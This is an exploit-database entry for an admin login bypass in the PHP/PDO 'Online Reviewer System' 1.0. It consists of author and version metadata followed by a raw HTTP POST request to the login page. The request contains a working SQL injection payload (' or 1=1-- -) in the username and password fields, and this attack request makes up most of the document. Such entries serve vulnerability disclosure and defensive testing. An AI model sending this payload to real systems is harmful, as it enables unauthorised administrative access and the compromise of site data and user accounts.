## https://sploitus.com/exploit?id=PACKETSTORM:161225
# Exploit Title: Online Reviewer System (PHPPDO) - Admin Authentication Bypass  
# Exploit Author: Richard Jones  
# Date: 2021-01-31  
# Vendor Homepage: https://www.sourcecodester.com/php/12937/online-reviewer-system-using-phppdo.html  
# Software Link: https://www.sourcecodester.com/download-code?nid=12937&title=Online+Reviewer+System+Using+PHP%2FPDO+with+Source+Code  
# Version: 1.0  
# Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34  
  
# Exploit URL: http://TARGET//reviewer/login/  
POST /reviewer/login/ HTTP/1.1  
Host: 127.0.0.1  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 70  
Cookie: PHPSESSID=e7vm5jbstk9ii5ghh7sm7n1mbc  
Upgrade-Insecure-Requests: 1  
  
username=a%27+or+1%3D1--+-&password=a%27+or+1%3D1--+-&btn-login=Log+In